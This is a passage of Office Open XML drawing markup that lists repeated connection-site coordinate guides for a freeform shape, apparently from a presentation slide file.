              <a:gd name="connsiteX17" fmla="*/ 323888 w 1342163"/>
              <a:gd name="connsiteY17" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 348319 w 1342163"/>
              <a:gd name="connsiteY18" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 385202 w 1342163"/>
              <a:gd name="connsiteY19" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 423583 w 1342163"/>
              <a:gd name="connsiteY20" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 429742 w 1342163"/>
              <a:gd name="connsiteY21" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 438024 w 1342163"/>
              <a:gd name="connsiteY22" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 441634 w 1342163"/>
              <a:gd name="connsiteY23" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 455500 w 1342163"/>
              <a:gd name="connsiteY24" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 458231 w 1342163"/>
              <a:gd name="connsiteY25" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 456489 w 1342163"/>
              <a:gd name="connsiteY26" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 463398 w 1342163"/>
              <a:gd name="connsiteY27" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 474657 w 1342163"/>
              <a:gd name="connsiteY28" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 480560 w 1342163"/>
              <a:gd name="connsiteY29" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 479873 w 1342163"/>
              <a:gd name="connsiteY30" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 471521 w 1342163"/>
              <a:gd name="connsiteY31" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 452174 w 1342163"/>
              <a:gd name="connsiteY32" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 453803 w 1342163"/>
              <a:gd name="connsiteY33" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 441503 w 1342163"/>
              <a:gd name="connsiteY34" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 441228 w 1342163"/>
              <a:gd name="connsiteY35" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 445527 w 1342163"/>
              <a:gd name="connsiteY36" fmla="*/ 3872886 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 455900 w 1342163"/>
              <a:gd name="connsiteY37" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 466796 w 1342163"/>
              <a:gd name="connsiteY38" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 474142 w 1342163"/>
              <a:gd name="connsiteY39" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 473438 w 1342163"/>
              <a:gd name="connsiteY40" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 476881 w 1342163"/>
              <a:gd name="connsiteY41" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 498311 w 1342163"/>
              <a:gd name="connsiteY42" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 480837 w 1342163"/>
              <a:gd name="connsiteY43" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 456245 w 1342163"/>
              <a:gd name="connsiteY44" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 441720 w 1342163"/>
              <a:gd name="connsiteY45" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 416894 w 1342163"/>
              <a:gd name="connsiteY46" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 374174 w 1342163"/>
              <a:gd name="connsiteY47" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 308426 w 1342163"/>
              <a:gd name="connsiteY48" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 279243 w 1342163"/>
              <a:gd name="connsiteY49" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 283313 w 1342163"/>
              <a:gd name="connsiteY50" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 251144 w 1342163"/>
              <a:gd name="connsiteY51" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 241031 w 1342163"/>
              <a:gd name="connsiteY52" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 225248 w 1342163"/>
              <a:gd name="connsiteY53" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 222706 w 1342163"/>
              <a:gd name="connsiteY54" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 223699 w 1342163"/>
              <a:gd name="connsiteY55" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 196683 w 1342163"/>
              <a:gd name="connsiteY56" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 173240 w 1342163"/>
              <a:gd name="connsiteY57" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 127039 w 1342163"/>
              <a:gd name="connsiteY58" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 98476 w 1342163"/>
              <a:gd name="connsiteY59" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 79271 w 1342163"/>
              <a:gd name="connsiteY60" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 85093 w 1342163"/>
              <a:gd name="connsiteY61" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 79485 w 1342163"/>
              <a:gd name="connsiteY62" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 85358 w 1342163"/>
              <a:gd name="connsiteY63" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 66946 w 1342163"/>
              <a:gd name="connsiteY64" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 55682 w 1342163"/>
              <a:gd name="connsiteY65" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 57138 w 1342163"/>
              <a:gd name="connsiteY66" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 52003 w 1342163"/>
              <a:gd name="connsiteY67" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 12141 w 1342163"/>
              <a:gd name="connsiteY68" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 9051 w 1342163"/>
              <a:gd name="connsiteY69" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 2707 w 1342163"/>
              <a:gd name="connsiteY70" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 3 w 1342163"/>
              <a:gd name="connsiteY71" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 3911 w 1342163"/>
              <a:gd name="connsiteY72" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 29283 w 1342163"/>
              <a:gd name="connsiteY73" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 29113 w 1342163"/>
              <a:gd name="connsiteY74" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 34806 w 1342163"/>
              <a:gd name="connsiteY75" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 44500 w 1342163"/>
              <a:gd name="connsiteY76" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 43543 w 1342163"/>
              <a:gd name="connsiteY77" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 33828 w 1342163"/>
              <a:gd name="connsiteY78" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY79" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78857 w 1342163"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115450 w 1342163"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 126950 w 1342163"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144357 w 1342163"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 155935 w 1342163"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 228778 w 1342163"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 244465 w 1342163"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 263305 w 1342163"/>
              <a:gd name="connsiteY10" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 251079 w 1342163"/>
              <a:gd name="connsiteY11" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 243737 w 1342163"/>
              <a:gd name="connsiteY12" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 242535 w 1342163"/>
              <a:gd name="connsiteY13" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 250120 w 1342163"/>
              <a:gd name="connsiteY14" fmla="*/ 5905303 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 280078 w 1342163"/>
              <a:gd name="connsiteY15" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 309876 w 1342163"/>
              <a:gd name="connsiteY16" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 323888 w 1342163"/>
              <a:gd name="connsiteY17" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 348319 w 1342163"/>
              <a:gd name="connsiteY18" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 385202 w 1342163"/>
              <a:gd name="connsiteY19" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 423583 w 1342163"/>
              <a:gd name="connsiteY20" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 429742 w 1342163"/>
              <a:gd name="connsiteY21" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 438024 w 1342163"/>
              <a:gd name="connsiteY22" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 441634 w 1342163"/>
              <a:gd name="connsiteY23" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 455500 w 1342163"/>
              <a:gd name="connsiteY24" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 458231 w 1342163"/>
              <a:gd name="connsiteY25" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 456489 w 1342163"/>
              <a:gd name="connsiteY26" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 463398 w 1342163"/>
              <a:gd name="connsiteY27" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 474657 w 1342163"/>
              <a:gd name="connsiteY28" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 480560 w 1342163"/>
              <a:gd name="connsiteY29" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 479873 w 1342163"/>
              <a:gd name="connsiteY30" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 471521 w 1342163"/>
              <a:gd name="connsiteY31" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 452174 w 1342163"/>
              <a:gd name="connsiteY32" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 453803 w 1342163"/>
              <a:gd name="connsiteY33" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 441503 w 1342163"/>
              <a:gd name="connsiteY34" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 441228 w 1342163"/>
              <a:gd name="connsiteY35" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 445527 w 1342163"/>
              <a:gd name="connsiteY36" fmla="*/ 3872886 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 455900 w 1342163"/>
              <a:gd name="connsiteY37" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 466796 w 1342163"/>
              <a:gd name="connsiteY38" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 474142 w 1342163"/>
              <a:gd name="connsiteY39" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 473438 w 1342163"/>
              <a:gd name="connsiteY40" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 476881 w 1342163"/>
              <a:gd name="connsiteY41" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 498311 w 1342163"/>
              <a:gd name="connsiteY42" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 480837 w 1342163"/>
              <a:gd name="connsiteY43" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 456245 w 1342163"/>
              <a:gd name="connsiteY44" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 441720 w 1342163"/>
              <a:gd name="connsiteY45" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 416894 w 1342163"/>
              <a:gd name="connsiteY46" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 374174 w 1342163"/>
              <a:gd name="connsiteY47" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 308426 w 1342163"/>
              <a:gd name="connsiteY48" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 279243 w 1342163"/>
              <a:gd name="connsiteY49" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 283313 w 1342163"/>
              <a:gd name="connsiteY50" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 251144 w 1342163"/>
              <a:gd name="connsiteY51" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 241031 w 1342163"/>
              <a:gd name="connsiteY52" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 225248 w 1342163"/>
              <a:gd name="connsiteY53" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 222706 w 1342163"/>
              <a:gd name="connsiteY54" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 223699 w 1342163"/>
              <a:gd name="connsiteY55" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 196683 w 1342163"/>
              <a:gd name="connsiteY56" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 173240 w 1342163"/>
              <a:gd name="connsiteY57" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 127039 w 1342163"/>
              <a:gd name="connsiteY58" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 98476 w 1342163"/>
              <a:gd name="connsiteY59" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 79271 w 1342163"/>
              <a:gd name="connsiteY60" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 85093 w 1342163"/>
              <a:gd name="connsiteY61" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 79485 w 1342163"/>
              <a:gd name="connsiteY62" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 85358 w 1342163"/>
              <a:gd name="connsiteY63" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 66946 w 1342163"/>
              <a:gd name="connsiteY64" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 55682 w 1342163"/>
              <a:gd name="connsiteY65" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 57138 w 1342163"/>
              <a:gd name="connsiteY66" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 52003 w 1342163"/>
              <a:gd name="connsiteY67" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 12141 w 1342163"/>
              <a:gd name="connsiteY68" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 9051 w 1342163"/>
              <a:gd name="connsiteY69" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 2707 w 1342163"/>
              <a:gd name="connsiteY70" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 3 w 1342163"/>
              <a:gd name="connsiteY71" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 3911 w 1342163"/>
              <a:gd name="connsiteY72" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 29283 w 1342163"/>
              <a:gd name="connsiteY73" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 29113 w 1342163"/>
              <a:gd name="connsiteY74" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 34806 w 1342163"/>
              <a:gd name="connsiteY75" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 44500 w 1342163"/>
              <a:gd name="connsiteY76" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 43543 w 1342163"/>
              <a:gd name="connsiteY77" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 33828 w 1342163"/>
              <a:gd name="connsiteY78" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY79" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78857 w 1342163"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115450 w 1342163"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 126950 w 1342163"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144357 w 1342163"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 155935 w 1342163"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 228778 w 1342163"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 244465 w 1342163"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 263305 w 1342163"/>
              <a:gd name="connsiteY10" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 251079 w 1342163"/>
              <a:gd name="connsiteY11" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 243737 w 1342163"/>
              <a:gd name="connsiteY12" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 242535 w 1342163"/>
              <a:gd name="connsiteY13" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 250120 w 1342163"/>
              <a:gd name="connsiteY14" fmla="*/ 5905303 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 280078 w 1342163"/>
              <a:gd name="connsiteY15" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 309876 w 1342163"/>
              <a:gd name="connsiteY16" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 323888 w 1342163"/>
              <a:gd name="connsiteY17" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 348319 w 1342163"/>
              <a:gd name="connsiteY18" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 385202 w 1342163"/>
              <a:gd name="connsiteY19" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 423583 w 1342163"/>
              <a:gd name="connsiteY20" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 429742 w 1342163"/>
              <a:gd name="connsiteY21" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 438024 w 1342163"/>
              <a:gd name="connsiteY22" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 441634 w 1342163"/>
              <a:gd name="connsiteY23" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 455500 w 1342163"/>
              <a:gd name="connsiteY24" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 458231 w 1342163"/>
              <a:gd name="connsiteY25" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 456489 w 1342163"/>
              <a:gd name="connsiteY26" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 463398 w 1342163"/>
              <a:gd name="connsiteY27" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 474657 w 1342163"/>
              <a:gd name="connsiteY28" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 480560 w 1342163"/>
              <a:gd name="connsiteY29" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 479873 w 1342163"/>
              <a:gd name="connsiteY30" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 471521 w 1342163"/>
              <a:gd name="connsiteY31" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 452174 w 1342163"/>
              <a:gd name="connsiteY32" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 453803 w 1342163"/>
              <a:gd name="connsiteY33" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 441503 w 1342163"/>
              <a:gd name="connsiteY34" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 441228 w 1342163"/>
              <a:gd name="connsiteY35" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 445527 w 1342163"/>
              <a:gd name="connsiteY36" fmla="*/ 3872886 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 455900 w 1342163"/>
              <a:gd name="connsiteY37" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 466796 w 1342163"/>
              <a:gd name="connsiteY38" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 474142 w 1342163"/>
              <a:gd name="connsiteY39" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 473438 w 1342163"/>
              <a:gd name="connsiteY40" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 476881 w 1342163"/>
              <a:gd name="connsiteY41" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 498311 w 1342163"/>
              <a:gd name="connsiteY42" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 480837 w 1342163"/>
              <a:gd name="connsiteY43" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 456245 w 1342163"/>
              <a:gd name="connsiteY44" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 441720 w 1342163"/>
              <a:gd name="connsiteY45" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 416894 w 1342163"/>
              <a:gd name="connsiteY46" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 374174 w 1342163"/>
              <a:gd name="connsiteY47" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 308426 w 1342163"/>
              <a:gd name="connsiteY48" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 279243 w 1342163"/>
              <a:gd name="connsiteY49" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 283313 w 1342163"/>
              <a:gd name="connsiteY50" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 251144 w 1342163"/>
              <a:gd name="connsiteY51" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 241031 w 1342163"/>
              <a:gd name="connsiteY52" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 225248 w 1342163"/>
              <a:gd name="connsiteY53" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 222706 w 1342163"/>
              <a:gd name="connsiteY54" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 223699 w 1342163"/>
              <a:gd name="connsiteY55" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 196683 w 1342163"/>
              <a:gd name="connsiteY56" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 173240 w 1342163"/>
              <a:gd name="connsiteY57" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 127039 w 1342163"/>
              <a:gd name="connsiteY58" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 98476 w 1342163"/>
              <a:gd name="connsiteY59" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 79271 w 1342163"/>
              <a:gd name="connsiteY60" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 85093 w 1342163"/>
              <a:gd name="connsiteY61" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 79485 w 1342163"/>
              <a:gd name="connsiteY62" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 85358 w 1342163"/>
              <a:gd name="connsiteY63" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 66946 w 1342163"/>
              <a:gd name="connsiteY64" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 55682 w 1342163"/>
              <a:gd name="connsiteY65" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 57138 w 1342163"/>
              <a:gd name="connsiteY66" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 52003 w 1342163"/>
              <a:gd name="connsiteY67" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 12141 w 1342163"/>
